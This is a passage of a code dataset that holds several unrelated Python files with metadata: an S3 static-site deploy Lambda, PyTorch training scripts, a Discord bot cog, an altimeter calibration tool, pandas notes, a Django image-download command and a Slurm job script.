urllib.request.urlopen(req)\n\n print(\"Response sent\")\n\n\ndef lambda_handler(event, context):\n try:\n print(event)\n\n if event[\"RequestType\"] == \"Create\" or event[\"RequestType\"] == \"Update\":\n # The location of the built static site archive file in S3\n bucket = event[\"ResourceProperties\"][\"StaticSiteArchiveS3Bucket\"]\n key = event[\"ResourceProperties\"][\"StaticSiteArchiveS3Object\"]\n version = event[\"ResourceProperties\"][\"StaticSiteArchiveS3ObjectVersion\"]\n\n # Get the archive object\n s3_obj = s3.get_object(Bucket=bucket, Key=key, VersionId=version)\n\n unzip_dir = f\"/tmp/unzip-{event['RequestId']}\"\n\n # Unzip the archive, to disk\n with zipfile.ZipFile(io.BytesIO(s3_obj[\"Body\"].read()), \"r\") as zip:\n zip.extractall(unzip_dir)\n\n # The bucket to deploy the static to\n deploy_bucket = event[\"ResourceProperties\"][\"StaticSiteS3DeployBucket\"]\n\n # Upload everything from the unzipped archive\n for root, dirs, files in os.walk(unzip_dir):\n for filename in files:\n\n local_path = os.path.join(root, filename)\n s3_key = os.path.relpath(local_path, unzip_dir)\n\n print(f\"Uploading {s3_key} to {deploy_bucket}\")\n mime_type = (\n mimetypes.guess_type(filename)[0] or \"application/octet-stream\"\n )\n extras = {\"ContentType\": mime_type}\n if re.search(r\"\\.html$\", filename):\n extras[\"CacheControl\"] = \"max-age=300\"\n s3.upload_file(local_path, deploy_bucket, s3_key, ExtraArgs=extras)\n\n send_response(event, context, STATUS_SUCCESS)\n else:\n send_response(event, context, STATUS_SUCCESS)\n\n except Exception as e:\n print(\"Function failed due to exception.\")\n print(e)\n traceback.print_exc()\n send_response(event, context, STATUS_FAILED, 
res_reason=str(e))\n","sub_path":"utility/lambdas/s3-static-site-deploy/lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":3434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"617984082","text":"from __future__ import print_function\nimport argparse\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom torchvision.transforms import RandomCrop, Resize, Compose, ToTensor\nfrom torchvision import datasets, transforms\nimport matplotlib.pyplot as plt\n\n# Training settings\nbatch_size = 64\n\ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\nprint('running device : {}'.format(device))\n\ntrans = Compose([Resize([512,512]), ToTensor()])\ntrain_dataset = datasets.ImageFolder(root='../dataset/train/', transform = trans)\nval_dataset = datasets.ImageFolder(root='../dataset/val/', transform = trans)\n\n# Data Loader (Input Pipeline)\ntrain_loader = torch.utils.data.DataLoader(dataset=train_dataset,\n batch_size=batch_size,\n shuffle=True)\n\nval_loader = torch.utils.data.DataLoader(dataset=val_dataset,\n batch_size=batch_size,\n shuffle=False)\n\n\nclass Net(nn.Module):\n\n def __init__(self):\n super(Net, self).__init__()\n self.conv1 = nn.Conv2d(3, 64, kernel_size=5, stride= 2, padding =2)\n self.conv2 = nn.Conv2d(64, 128, kernel_size=5)\n self.conv3 = nn.Conv2d(128, 128, kernel_size=3)\n self.mp = nn.MaxPool2d(2)\n self.fc1 = nn.Linear(128*30*30, 2048)\n self.fc2 = nn.Linear(2048, 4)\n\n def forward(self, x):\n in_size = x.size(0)\n x = F.relu(self.mp(self.conv1(x))) #(64,128,128)\n x = F.relu(self.mp(self.conv2(x))) #(128, 62, 62)\n x = F.relu(self.mp(self.conv3(x))) #(128, 30, 30)\n x = x.view(in_size, -1) # flatten the tensor\n x = self.fc1(x)\n x = self.fc2(x)\n return F.log_softmax(x)\n\ndef weight_init(m):\n if isinstance(m, torch.nn.Conv2d) or isinstance(m, torch.nn.Linear):\n torch.nn.init.xavier_uniform_(m.weight)\n\n\ndef plotdata(trl, tel, tea):\n xlist = range(len(trl))\n ax1 = plt.subplot(2, 1, 1)\n plt.plot(xlist, trl, 'r-', label='train loss')\n plt.plot(xlist, tel, 'b-', label='validation loss')\n plt.ylabel('loss value')\n plt.title('loss graph')\n plt.legend(loc=1)\n\n ax2 = plt.subplot(2, 1, 2)\n plt.plot(xlist, tea, 'b-', label='validation acc')\n #plt.ylim(0, 100)\n #plt.xlim(0, 100)\n plt.yticks(range(0,101,10))\n plt.grid(True)\n plt.ylabel('acc(%)')\n plt.title('acc graph')\n plt.legend(loc=1)\n\n plt.tight_layout()\n\n plt.savefig('batchNorWithxavier.png', dpi=300)\n plt.close()\n\nmodel = Net()\nmodel.apply(weight_init)\nmodel.to(device)\n\noptimizer = optim.Adam(model.parameters(), lr=0.0005)\n\ntrloss, teloss, teacc = [], [], []\n\ndef train(epoch):\n model.train()\n for batch_idx, (data, target) in enumerate(train_loader):\n data = data.to(device)\n target = target.to(device)\n optimizer.zero_grad()\n output = model(data)\n loss = F.nll_loss(output, target)\n loss.backward()\n optimizer.step()\n if batch_idx % 10 == 0:\n print('Train Epoch: {} [{}/{} ({:.0f}%)]\\tLoss: {:.6f}'.format(\n epoch, batch_idx * len(data), len(train_loader.dataset),\n 100. * batch_idx / len(train_loader), loss.item()))\n trloss.append(loss.item())\n acc = test()\n plotdata(trloss, teloss, teacc)\n return acc\n\ndef test():\n model.eval()\n test_loss = 0\n correct = 0\n for data, target in val_loader:\n data = data.to(device)\n target = target.to(device)\n output = model(data)\n # sum up batch loss\n test_loss += F.nll_loss(output, target, size_average=False).item()\n # get the index of the max log-probability\n pred = output.data.max(1, keepdim=True)[1]\n correct += pred.eq(target.data.view_as(pred)).cpu().sum()\n\n test_loss /= len(val_loader.dataset)\n print('\\nTest set: Average loss: {:.4f}, Accuracy: {}/{} ({:.0f}%)\\n'.format(\n test_loss, correct, len(val_loader.dataset),\n 100. * correct / len(val_loader.dataset)))\n teloss.append(test_loss)\n teacc.append(100. * correct / len(val_loader.dataset))\n return correct\n\n\ndef save_checkpoint(state, filename='model_adam.pth.tar'):\n torch.save(state, filename)\n\n\nacc_ = 0\nfor epoch in range(1, 201):\n accuracy = train(epoch)\n if acc_ < accuracy:\n acc_ = accuracy\n ep = epoch\n save_checkpoint(model.state_dict()) # save the best model weights, not the epoch number\nprint('model saved at %d epoch'%ep)\n","sub_path":"sangkyu/CNN.py","file_name":"CNN.py","file_ext":"py","file_size_in_byte":4506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"479188120","text":"import EGraphics as eg\nfrom EGraphics import color as col\n\nwin = eg.create_window()\n\nx = -25\nwhile True:\n eg.fill(win, col.white)\n eg.draw_circle(win, col.black, 275, 275, 25)\n eg.draw_circle(win, col.red, 250, 250, 25, transparent=150)\n eg.draw_rectangle(win, col.green, x, 250, 50, 50, transparent=150)\n eg.draw_rectangle(win, col.blue, 250, x, 50, 50, transparent=150)\n\n x += 0.05\n if x > 525:\n x = -25\n eg.update()","sub_path":"transparenci_testEG.py","file_name":"transparenci_testEG.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"246836267","text":"import json\n\nimport discord\nfrom discord.ext import commands\nfrom sqlalchemy import func\nfrom sqlalchemy.orm import aliased\nfrom src.util.exceptions import MissingRequiredParameter\nfrom src.model.chapter import Chapter\nfrom src.model.message import Message\nfrom src.model.project import Project\nfrom src.model.staff import Staff\nfrom src.util import exceptions\nfrom src.util.search import searchproject, searchstaff, fakesearch\nfrom src.util.misc import FakeUser, formatNumber, make_mentionable, toggle_mentionable, strx\n\nwith open('src/util/help.json', 'r') as f:\n jsonhelp = json.load(f)\n\n\nclass Note(commands.Cog):\n\n def __init__(self, bot):\n self.bot = bot\n\n\n async def cog_check(self, ctx):\n worker = ctx.guild.get_role(self.bot.config[\"neko_workers\"])\n ia = worker in ctx.message.author.roles\n ic = ctx.channel.id == self.bot.config[\"command_channel\"]\n guild = ctx.guild is not None\n if ia and ic and guild:\n return True\n elif ic:\n raise exceptions.MissingRequiredPermission(\"Missing permission `Neko Worker`.\")\n elif not guild:\n raise exceptions.MissingRequiredPermission(\"Missing permission `Server Member`.\")\n\n\n @commands.command(aliases=[\"an\"], description=jsonhelp[\"addnote\"][\"description\"],\n usage=jsonhelp[\"addnote\"][\"usage\"], brief=jsonhelp[\"addnote\"][\"brief\"], help=jsonhelp[\"addnote\"][\"help\"])\n async def addnote(self, ctx, *, arg):\n session = self.bot.Session()\n try:\n arg = arg[1:]\n d = dict(x.split('=', 1) for x in arg.split(' -'))\n if \"p\" in d and \"c\" in d and \"note\" in d:\n query = session.query(Chapter)\n proj = searchproject(d[\"p\"], session)\n record = query.filter(Chapter.project_id == proj.id).filter(Chapter.number == int(d[\"c\"])).one()\n record.notes = strx(record.notes)+(\"{}\\n\".format(d[\"note\"]))\n await ctx.message.add_reaction(\"👍\")\n session.commit()\n finally:\n session.close()\n\n\n @commands.command(aliases=[\"n\", \"notes\"],description=jsonhelp[\"note\"][\"description\"],\n usage=jsonhelp[\"note\"][\"usage\"], brief=jsonhelp[\"note\"][\"brief\"], help=jsonhelp[\"note\"][\"help\"])\n async def note(self, ctx, *, arg):\n session = self.bot.Session()\n try:\n arg = arg[1:]\n d = dict(x.split('=', 1) for x in arg.split(' -'))\n proj = searchproject(d[\"p\"], session)\n note = session.query(Chapter).filter(proj.id == Chapter.project_id).filter(Chapter.number == int(d[\"c\"])).one()\n await ctx.send(note.notes)\n finally:\n session.close()\n\ndef setup(Bot):\n Bot.add_cog(Note(Bot))","sub_path":"src/cogs/note.py","file_name":"note.py","file_ext":"py","file_size_in_byte":2781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"207565355","text":"w=open('one.txt','r').read()\r\nq=g=w.splitlines()\r\nname=[]\r\npara=[]\r\nfunc=[]\r\nvar={}\r\nfor line in g:\r\n if '#define' in line:\r\n if '(' in line:\r\n g=line.replace('#define','').replace(' ','').replace(';','')\r\n name.append(g[:g.find('(')])\r\n func.append(g[g.find('{')+1:g.find('}')])\r\n para.append(dict([(x,'') for x in g[g.find('(')+1:g.find(')')].replace(' ','').split(',')]))\r\n else:\r\n g=line.replace('#define','').replace(';','').split()\r\n var.update({g[0]:g[1]})\r\n else:\r\n fn=line[:line.find('(')]\r\n if fn in name:\r\n for v1,v2 in zip(para[name.index(fn)],line[line.find('(')+1:line.find(')')].replace(' ','').split(',')):\r\n para[name.index(fn)][v1]=v2\r\n for word in func[name.index(fn)]:\r\n if word in para[name.index(fn)]:\r\n func[name.index(fn)]=func[name.index(fn)].replace(word,para[name.index(fn)][word])\r\nfor line in q:\r\n if '#define' in line:\r\n continue\r\n else:\r\n if line[:line.find('(')] in name:\r\n print(func[name.index(line[:line.find('(')])])\r\n else:\r\n for val in var:\r\n line=line.replace(val,var[val])\r\n print(line)\r\n \r\n \r\n \r\n \r\n","sub_path":"EX 6/python code/macroprocessor.py","file_name":"macroprocessor.py","file_ext":"py","file_size_in_byte":1342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"169458565","text":"'''\nTrain/test in MNIST\n'''\nimport torch\nimport torchvision\nimport torchvision.transforms as transforms\nimport RBM\nimport torch.nn as nn\nclass RBMLSTMModel(nn.Module):\n def __init__(self, ninput, n_rbm_unit, nhid, nlayers, noutput, dropout=0.25, RBM_weights = []):\n super(RBMLSTMModel, self).__init__()\n self.drop = nn.Dropout(dropout)\n self.encoder = nn.Linear(ninput*ninput, ninput * n_rbm_unit)\n self.rnn = nn.LSTM(n_rbm_unit, nhid, nlayers, dropout=dropout, batch_first=True)\n self.decoder = nn.Linear(nhid, noutput)\n\n self.ninput = ninput\n self.n_rbm_unit = n_rbm_unit\n self.nlayers = nlayers\n self.nhid = nhid\n\n self.init_weights(RBM_weights)\n\n def init_weights(self,RBM_weights):\n initrange = 0.1\n self.decoder.bias.data.zero_()\n self.decoder.weight.data.uniform_(-initrange, initrange)\n if RBM_weights == []: # 1. 
default param init\n self.encoder.weight.data.uniform_(-initrange, initrange)\n self.encoder.bias.data.zero_()\n else: # 2. init param with RBM weights!\n self.encoder.weight.data = RBM_weights[0]\n self.encoder.bias.data = RBM_weights[1]\n\n def forward(self, input, hidden):\n z = self.encoder(input.reshape(-1, self.ninput * self.n_rbm_unit))\n z = z.reshape(-1, self.ninput, self.n_rbm_unit)\n output, hidden = self.rnn(z, hidden)\n output = self.drop(output)\n decoded = self.decoder(output)\n return decoded\n\n def init_hidden(self, bsz, cuda_flag = False):\n weight = next(self.parameters())\n if cuda_flag == False:\n return (weight.new_zeros(self.nlayers, bsz, self.nhid),\n weight.new_zeros(self.nlayers, bsz, self.nhid))\n return (weight.new_zeros(self.nlayers, bsz, self.nhid).cuda(),\n weight.new_zeros(self.nlayers, bsz, self.nhid).cuda())\n\ndef train(model,trainloader,optimizer,device,criterion):\n for i, data in enumerate(trainloader, 0): # get the inputs; data is a list of [inputs, labels]\n images, labels = data\n temp_shape = images.shape\n images = images.reshape([temp_shape[0], temp_shape[2], temp_shape[3]])\n images = images.to(device)\n labels = labels.to(device)\n hidden = model.init_hidden(temp_shape[0], cuda_flag=True)\n model.to(device)\n\n model.zero_grad()\n output = model(images, hidden)\n loss = criterion(output[:, -1, :], labels)\n loss.backward()\n optimizer.step()\n\n print('loss:', loss.item())\n\ndef test(model,testloader,device,classes):\n class_correct = list(0. for i in range(10))\n class_total = list(0. for i in range(10))\n with torch.no_grad():\n for data in testloader:\n images, labels = data\n temp_shape = images.shape\n hidden = model.init_hidden(temp_shape[0], cuda_flag=True)\n images = images.reshape([temp_shape[0], temp_shape[2], temp_shape[3]])\n images = images.to(device)\n labels = labels.to(device)\n model.to(device)\n outputs = model(images, hidden)\n _, predicted = torch.max(outputs[:, -1, :], 1)\n c = (predicted == labels).squeeze()\n for i in range(labels.size(0)): # count the whole batch, not just the first 4 samples\n label = labels[i]\n class_correct[label] += c[i].item()\n class_total[label] += 1\n sum_acc = 0\n eps = 0.00000001\n for i in range(10):\n print('Accuracy of %3s : %2d %%' % (\n classes[i], 100 * class_correct[i] / (class_total[i] + eps)))\n sum_acc += class_correct[i] / (class_total[i] + eps) * 100\n\n print('Accuracy of all: %.2f %%' % (sum_acc / 10))\n\ndef main():\n # train on the GPU or on the CPU, if a GPU is not available\n batch_size = 64\n transform = transforms.Compose(\n [transforms.ToTensor(),\n transforms.Normalize((0.1307,), (0.3081,))])\n device = torch.device('cuda') if torch.cuda.is_available() else torch.device('cpu')\n\n # get MNIST data, and shuffle them\n trainset = torchvision.datasets.MNIST(root='./data', train=True, download=True, transform=transform)\n indices = torch.randperm(len(trainset)).tolist()\n trainset = torch.utils.data.Subset(trainset, indices[:3000])\n\n testset = torchvision.datasets.MNIST(root='./data', train=False, download=True, transform=transform)\n indices = torch.randperm(len(testset)).tolist()\n testset = torch.utils.data.Subset(testset, indices[:])\n\n trainloader = torch.utils.data.DataLoader(trainset, batch_size=batch_size, shuffle=True, num_workers=2)\n testloader = torch.utils.data.DataLoader(testset, batch_size=batch_size, shuffle=False, num_workers=2)\n\n classes = ('0', '1', '2', '3', '4', '5', '6', '7', '8', '9')\n\n # we will use RBM trained weights to init first encoder layer\n #rbm = RBM.RBM().to(device)\n #RBM_weights = 
rbm.RBMtrain(trainloader, numdims=28*28, numhid=28*28, maxepoch=2)\n\n model = RBMLSTMModel(\n noutput=10,\n ninput=28,\n n_rbm_unit=28,\n nhid=64,\n nlayers=1,\n RBM_weights=[]\n )\n\n # construct an optimizer\n params = [p for p in model.parameters() if p.requires_grad]\n criterion = nn.CrossEntropyLoss()\n optimizer = torch.optim.SGD(params, lr=0.005,\n momentum=0.9, weight_decay=0.0005)\n\n n_epoch = 20\n for iter in range(n_epoch):\n train(model,trainloader,optimizer,device,criterion)\n\n torch.save(model.state_dict(), 'lastParams')\n model.load_state_dict(torch.load('lastParams'))\n\n model.eval()\n test(model,testloader,device,classes)\n\nif __name__ == \"__main__\":\n main()","sub_path":"RBMs-LSTM.py","file_name":"RBMs-LSTM.py","file_ext":"py","file_size_in_byte":5688,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"473705151","text":"\"\"\" produce\n\nThis program is to calibrate the BSR AltAcc and save results to a file\n\"\"\"\n\nimport math\nimport argparse\nimport logging\nfrom prodata import *\n\nVERSION = \"1.25c\"\nPORT = \"/dev/ttyUSB0\"\nBAUD = 9600\nTICK_CHAR = '.'\n\nData = namedtuple('Data', \"n, sum_ squares\")\nSamples = namedtuple('Samples', \"acc pre\")\n\n\ndef parse_commandline():\n global args, parser\n\n parser = argparse.ArgumentParser(prog='probate', description=f'AltAcc calibration program (v{VERSION})')\n parser.add_argument('-p', '--port', help='serial/com port')\n parser.add_argument('-n', '--nit', default=NIT_NAME, help='override init filename')\n parser.add_argument('-o', '--out', help='output calibration filename')\n\n parser.add_argument('-q', '--quiet', action='store_true', help=\"be quiet about it\")\n parser.add_argument('--version', action='version', version=f'v{VERSION}')\n parser.add_argument('calfile', default=None, nargs='?', action='store',\n help='output calibration filename (same as --out)')\n\n args = parser.parse_args()\n\n\ndef set_port(port):\n if port == 'MOCK':\n class SerMock:\n name = port\n \n def write(self, data):\n pass\n \n def read(self, count):\n return b'125 236\\n'\n\n return SerMock() \n else:\n import serial\n com = serial.Serial(port=port, baudrate=BAUD)\n if not com:\n print(\"could not open\", port)\n sys.exit(1)\n\n return com\n\n\ndef get_samples(com):\n # discard any noise on the line\n com.reset_input_buffer()\n com.reset_output_buffer()\n\n com.write(b'/T')\n\n samples = []\n for i in range(256):\n line = com.read(8)\n if len(line) < 8:\n break\n\n # Due to the LED sharing the serial line check for and discard noise\n if b'\\x00' in line:\n # attempt to sync with the end of line\n while True:\n c = com.read(1)\n if c == b'\\n':\n break\n continue\n\n a, p = [int(x) for x in line.strip().split()]\n \n samples.append(Samples._make((a, p)))\n \n if i % 8 == 0:\n print(TICK_CHAR, end='')\n sys.stdout.flush()\n print()\n\n return samples\n\n\ndef get_data(com, what):\n while True:\n data = get_samples(com)\n\n print(f\"received {len(data)} of 256 samples from the AltAcc on {com.name}\")\n\n s = input(\"accept AltAcc data? 
( y-yes | n-no | x-exit ) \")\n\n if s in ('x', 'X'):\n sys.exit(3)\n\n if s not in ('n', 'N'): # i.e. default answer == 'y'\n break\n\n count = len(data)\n sum_ = 0.0\n squares = 0.0\n\n for i in range(count):\n dtemp = data[i].pre if what == 'pre' else data[i].acc\n sum_ += dtemp\n squares += dtemp * dtemp\n\n return Data._make((count, sum_, squares))\n\n\ndef main():\n\n parse_commandline()\n print()\n print(args)\n\n cal_filename = args.calfile or args.out\n if not cal_filename:\n parser.print_help()\n sys.exit(1)\n\n # Create a skeleton cal dict\n cal = {k: None for k in cal_info.keys()}\n\n # go read the .nit file -- (v2) -- Moved here so CalFile, et al are set\n nit = read_nitfile(args.nit)\n print(nit)\n\n # Open the com port\n port = args.port or nit['port'] or PORT\n com = set_port(port)\n\n print(f\"gathering calibration data from the AltAcc on {port}\")\n\n s = input(\"\\nEnter the absolute Barometric Pressure ( x to exit ) \")\n if s.strip() in ('x', 'X'):\n sys.exit(3)\n\n cal['ActBP'] = float(s)\n\n s = input(\"\\nEnter the actual altitude ( x to exit ) \")\n if s.strip() in ('x', 'X'):\n sys.exit(3)\n\n cal['ActAlt'] = float(s)\n\n # get_load (1, 0)\n pre = get_data(com, \"pre\")\n\n cal['AvgBP'] = pre.sum_ / pre.n\n cal['StDBP'] = math.sqrt((pre.squares - (pre.sum_ * pre.sum_ / pre.n)) / (pre.n - 1))\n\n # Work out offset\n cal['OffBP'] = calc_offset(cal['ActBP'], cal['AvgBP'])\n\n dump_calfile(None, cal)\n\n # Accelerometer calibration\n print(\"\\nSet the AltAcc Upside Down to Measure -1 G\")\n s = input(\"then press enter when ready ( x to quit ) \")\n if s.strip() in ('x', 'X'):\n sys.exit(3)\n\n # get_load (0, 1)\n neg = get_data(com, \"acc\")\n\n cal['AvgNegG'] = neg.sum_ / neg.n\n cal['StDNegG'] = math.sqrt((neg.squares - (neg.sum_ * neg.sum_ / neg.n)) / (neg.n - 1))\n\n print(\"\\nSet the AltAcc Flat to Measure Zero G\")\n s = input(\"then press enter when ready ( x to quit ) \")\n if s.strip() in ('x', 'X'):\n sys.exit(3)\n\n # GetaLoadaData(0, 2);\n zero = get_data(com, \"acc\")\n\n cal['AvgZeroG'] = zero.sum_ / zero.n\n cal['StDZeroG'] = math.sqrt((zero.squares - (zero.sum_ * zero.sum_ / zero.n)) / (zero.n - 1))\n\n cal['FiDNegG'] = cal['AvgZeroG'] - cal['AvgNegG']\n\n print(\"\\nSet the AltAcc Right side Up to Measure Plus One G\")\n input(\"then press enter when ready ( x to quit ) \")\n\n # GetaLoadaData(0, 3);\n one = get_data(com, \"acc\")\n\n cal['AvgOneG'] = one.sum_ / one.n\n cal['StDOneG'] = math.sqrt((one.squares - (one.sum_ * one.sum_ / one.n)) / (one.n - 1))\n\n cal['FiDZeroG'] = cal['AvgOneG'] - cal['AvgZeroG']\n\n # calculate slope. Least Squares is simplified with X = { -1,0,+1 }\n cal['Slope'] = (one.sum_ - neg.sum_) / (one.n + neg.n)\n\n # Y-Intercept is the Avg G Value:\n cal['YZero'] = (one.sum_ + zero.sum_ + neg.sum_) / (one.n + zero.n + neg.n)\n\n # Correlation Coefficient = 1 - std^2_y_x / std_y^2\n\n # Estimate Output at G = -1, do sum of diff squared\n dtemp = cal['AvgNegG'] - (-1 * cal['Slope'] + cal['YZero'])\n std_y_x = neg.sum_ * neg.sum_ * dtemp * dtemp\n\n # Estimate Output at G = 0\n dtemp = cal['AvgZeroG'] - cal['YZero']\n std_y_x += (zero.sum_ * zero.sum_ * dtemp * dtemp)\n\n # Estimate Output at G = 1\n dtemp = cal['AvgOneG'] - (cal['Slope'] + cal['YZero'])\n std_y_x += one.sum_ * one.sum_ * dtemp * dtemp\n\n dtemp = one.sum_ + zero.sum_ + neg.sum_\n n = one.n + zero.n + neg.n\n\n std_y_x /= n - 2\n\n std_y = ((one.squares + zero.squares + neg.squares) - ((dtemp * dtemp) / n)) / (n - 1)\n if std_y > 0:\n cal['CCoff'] = 1.0 - (std_y_x / std_y)\n\n # Test for proper operation and a good unit\n if cal['FiDNegG'] <= 0.0 or cal['FiDZeroG'] <= 0.0:\n print(\"\\n*** Warning *** Average Values indicate calibration error\")\n s = input(\" or a defective unit. Save data? ( y | n ) \")\n if s in ('n', 'N'):\n sys.exit(3)\n \n dump_calfile(cal_filename, cal)\n\n if not args.quiet:\n dump_calfile(None, cal)\n\n\nif \"win\" not in sys.platform:\n # For Pythonista bug in debug\n sys.argv = ['probate.py', 'pb.cal']\n\nmain()\n","sub_path":"probate.py","file_name":"probate.py","file_ext":"py","file_size_in_byte":6788,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"220459012","text":"#apply sort_values \n\nfrom scipy.spatial import distance\n\n# Fill in NA values in nba_normalized\nnba_normalized.fillna(0, inplace=True)\n\n# Find the normalized vector for lebron james.\nlebron_normalized = nba_normalized[nba[\"player\"] == \"LeBron James\"]\n\n# Find the distance between lebron james and everyone else.\neuclidean_distances = nba_normalized.apply(lambda row: distance.euclidean(row, lebron_normalized), axis=1)\n\nsorted_distance = euclidean_distances.sort_values()\nresult_index = sorted_distance.index[1]\nmost_similar_to_lebron = nba.loc[result_index,\"player\"]\n\n\n#pivot_table\nimport numpy as np\n\n# This will compute the mean survival chance and the mean age for each passenger class\npassenger_survival = titanic_survival.pivot_table(index=\"pclass\", values=[\"age\", \"survived\"], aggfunc=np.mean)\nprint(passenger_survival)\n\nport_stats = titanic_survival.pivot_table(index=\"embarked\",values=[\"age\",\"survived\",\"fare\"],aggfunc = np.mean)\n\n\n\n#value_counts Returns object containing counts of unique values\n#use value_counts to get the unique index values of a column and their counts, then use index to get the deduplicated index\nimport numpy as np\nprint(all_ages['Major_category'].value_counts().index)\n\nrecent_grads = pd.read_csv(\"recent-grads.csv\")\n\nall_ages_major_categories = dict()\nrecent_grads_major_categories = dict()\nall_ages_major_categories = all_ages.pivot_table(index=\"Major_category\",values=\"Total\",aggfunc = np.sum).to_dict()\nrecent_grads_major_categories = recent_grads.pivot_table(index=\"Major_category\",values=\"Total\",aggfunc = np.sum).to_dict()\n\n\"\"\"\nEngineering 29\nEducation 16\nHumanities & Liberal Arts 15\nBiology & Life Science 14\nBusiness 13\nHealth 12\nComputers & Mathematics 11\nAgriculture & Natural Resources 10\nPhysical Sciences 10\nSocial Science 9\nPsychology & Social Work 9\nArts 8\nIndustrial Arts & Consumer Services 7\nLaw & Public Policy 5\nCommunications & Journalism 
4\nInterdisciplinary 1\nName: Major_category, dtype: int64\n\"\"\"\n\n\n\n\n#to_list() reindex()\n#The reindex() method allows you to specify an alternate ordering of the labels (index) \n#for a Series object. This method takes in a list of strings corresponding to the order of labels you'd like for that Series object\noriginal_index = series_custom.index.tolist()\nsorted_index = sorted(original_index)\nsorted_by_index = series_custom.reindex(sorted_index)\n\n# reset_index\n# 使用 dropna 后,index 改变 用 reset_index 恢复从0开始的顺序 \ntitanic_reindexed = titanic_survival.dropna(subset=[\"age\",\"boat\"]).reset_index(drop=True)\n\n# set_index \n#Use the Pandas DataFrame method set_index to assign the FILM column as the custom index \n#for the DataFrame without the FILM column dropped from the \nfandango = pd.read_csv('fandango_score_comparison.csv')\nfandango_films = fandango.set_index(fandango[\"FILM\"].values,inplace = False,drop=False)\nprint(fandango_films.index)\n\n\n\n\n\n\n#dtype\n\n# returns the data types as a Series\ntypes = fandango_films.dtypes\n# filter data types to just floats, index attributes returns just column names\nfloat_columns = types[types.values == 'float64'].index\n# use bracket notation to filter columns to just float columns\nfloat_df = fandango_films[float_columns]\n\n# `x` is a Series object representing a column\ndeviations = float_df.apply(lambda x: np.std(x))\n\nprint(deviations)\n\n\n#sort by index and by values\nsc2 = series_custom.sort_index()\nsc3 = series_custom.sort_values()\nprint(sc2.iloc[0])\nprint(sc3.iloc[0])\n\n\n#iloc\nfirst_last = fandango.iloc[[0,-1]]\nprint(first_last)\n\n\n\n\n#to_numeric\ncols = ['AP Test Takers ', 'Total Exams Taken', 'Number of Exams with scores 3 4 or 5']\n\nfor col in cols:\n data[\"ap_2010\"][col] = pandas.to_numeric(data[\"ap_2010\"][col], errors=\"coerce\")\n \nprint(data[\"ap_2010\"].head())\n","sub_path":"little_skill.py","file_name":"little_skill.py","file_ext":"py","file_size_in_byte":4055,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"560449189","text":"def inverte_dicionario(d):\n dnovo = {}\n for i in d.values():\n if i not in dnovo.keys():\n lista = []\n for j in d.keys():\n if d[j] == i:\n lista.append(j)\n dnovo[i] = lista\n return dnovo\n ","sub_path":"backup/user_059/ch84_2020_05_14_00_55_38_575798.py","file_name":"ch84_2020_05_14_00_55_38_575798.py","file_ext":"py","file_size_in_byte":271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"636190016","text":"import urllib\nimport os\n\nfrom django.core.files import File\nfrom django.core.files.temp import NamedTemporaryFile\nfrom django.core.management.base import BaseCommand\nfrom django.utils.encoding import smart_text\nfrom PIL import Image, ImageFile\n\nfrom auth.email import render_and_send_mail\nfrom order.models import ListingQueuedImage\nfrom settings import SERVER_EMAIL, MEDIA_ROOT\n\nimport logging\nlogger = logging.getLogger('django.request')\n\nclass Command(BaseCommand):\n def handle(self, *args, **options):\n\n lqis = ListingQueuedImage.objects.filter(processing=False)\n self.stdout.write('Processing download of %s image%s ...\\n' % (\n lqis.count(),\n \"s\" if lqis.count() != 1 else \"\"\n ))\n\n results = {}\n names = {}\n successes = {}\n failures = {}\n\n for lqi in lqis:\n\n # Flag the queued image for processing\n ListingQueuedImage.objects.filter(pk=lqi.pk).update(processing=True)\n\n # Initialize necessities\n v = lqi.listing.vendor\n 
if v.pk not in results.keys():\n results[v.pk] = {\n 'name' : v.name,\n 'email' : v.email,\n 'successes' : 0,\n 'errors' : []\n }\n\n try:\n file = urllib.urlretrieve(lqi.url)\n filename = (\"%s.jpg\" % (\n \".\".join(\n lqi.url\n .split('?')[0]\n .split('/')[-1]\n .split('.')[0:-1]\n )\n or \"unnamed-image\"\n )).strip()\n\n if lqi.listing.product_image:\n lqi.listing.product_image.delete()\n lqi.listing.product_image.save(filename, File(open(file[0])))\n lqi.listing.save()\n lqi.listing.set_product_image()\n lqi.delete()\n\n results[v.pk]['successes'] += 1\n\n except Exception as e:\n import sys\n results[v.pk]['errors'].append({\n 'listing' : lqi.listing,\n 'error' : \"%s\" % smart_text(e)\n })\n\n for v_pk, context in results.items():\n render_and_send_mail(\n \"Results of image downloads for bulk item upload\",\n context,\n \"download_product_images_results\",\n [context['email']]\n )\n","sub_path":"catalog/management/commands/download_product_images.py","file_name":"download_product_images.py","file_ext":"py","file_size_in_byte":2548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"477647050","text":"'''simple script for submitting slurm jobs'''\nimport os\nimport pdb\nimport time\nimport random\nimport datetime\nimport subprocess\n\nif 'cs.nyu.edu' in os.uname()[1] or 'dgx' in os.uname()[1]:\n PATH_PREFIX = '/misc/vlgscratch4/BowmanGroup/awang'\n gpu_type = '1080ti'\nelse:\n PATH_PREFIX = '/beegfs/aw3272'\n gpu_type = 'p40' # should be p100 or p40\n\nsmall_tasks = [('squad', 723), ('wnli', 5), ('msrp', 25), ('rte', 18), ('sts-b', 39)]\nbig_tasks = [('mnli', 2612), ('quora', 2421)]\npair_tasks = small_tasks + big_tasks\nsingle_tasks = [('sst', 1053), ('acceptability', 134)]\ntasks = [('qnliv2', 723)] 